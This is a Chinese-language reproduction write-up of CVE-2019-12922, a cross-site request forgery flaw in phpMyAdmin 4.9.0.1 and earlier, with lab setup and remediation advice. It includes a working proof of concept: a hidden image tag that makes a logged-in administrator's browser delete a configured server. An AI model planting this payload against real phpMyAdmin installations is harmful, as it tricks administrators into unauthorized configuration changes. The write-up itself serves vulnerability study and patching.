CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站請求僞造漏洞復現
0X01 漏洞概述
安全研究人員Manuel Garcia Cardenas近日公佈了最常用的管理MySQL和MariaDB數據庫的應用程序phpMyAdmin中的0 day漏洞細節和PoC。
phpMyAdmin是一個用PHP編寫的免費軟件工具,也是用於處理MySQL或MariaDB數據庫服務器的開源管理工具。phpMyAdmin被廣泛用於管理用WordPress, Joomla等內容管理平臺的網站的數據庫。
安全研究人員稱該漏洞實際上是一個CSRF漏洞,也叫做XSRF漏洞。即攻擊者可以誘使認證的用戶來執行惡意行爲。
該漏洞CVE編號爲CVE-2019-12922,攻擊者利用該漏洞來刪除受害者服務器上的phpMyAdmin面板上的設置頁面中配置的任意服務器。但該攻擊並不允許攻擊者刪除服務器上保存的數據庫或表。
而攻擊者只需要發送一個僞造的URL到目標web管理員,要求web管理員已經用相同的瀏覽器登入phpmyAdmin面板,這樣就可以誘使用戶通過點擊來刪除配置的服務器。Cardenas解釋說,攻擊者在僞造的URL中含有想要由用戶執行的請求,這樣由於錯誤使用HTTP方法使用CSRF攻擊成爲可能。
該漏洞利用起來非常容易,因爲攻擊者只需要知道目標服務器的URL就可以了,並不需要了解其他任何信息,包括數據庫的name。
- 受影響的版本
phpMyAdmin <= 4.9.0.1
0X02 環境搭建
在phpMyAdmin官網上找到歷史版本下載鏈接
https://www.phpmyadmin.net/files/
0X03 漏洞復現
在登錄狀態下,添加一個服務器
http://127.0.0.1/phpmyadmin/setup/index.php
已經有test01服務器,創建test02服務器
- POC
<p>Deleting Server 1</p>
<img src=”
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1″
style=”display:none;” />
抓包可以發現參數id對應的是第幾個服務器 ,我們刪除第一個服務器,poc構造如下。
點擊我們構造的惡意鏈接時,成功刪除test01服務器
0X04 漏洞修復
- 升級到最新版,不要輕易點擊不可信網頁鏈接
0X05 參考鏈接
-
https://mp.weixin.qq.com/s/TGs1-z8gqAY3-9TFglIHfg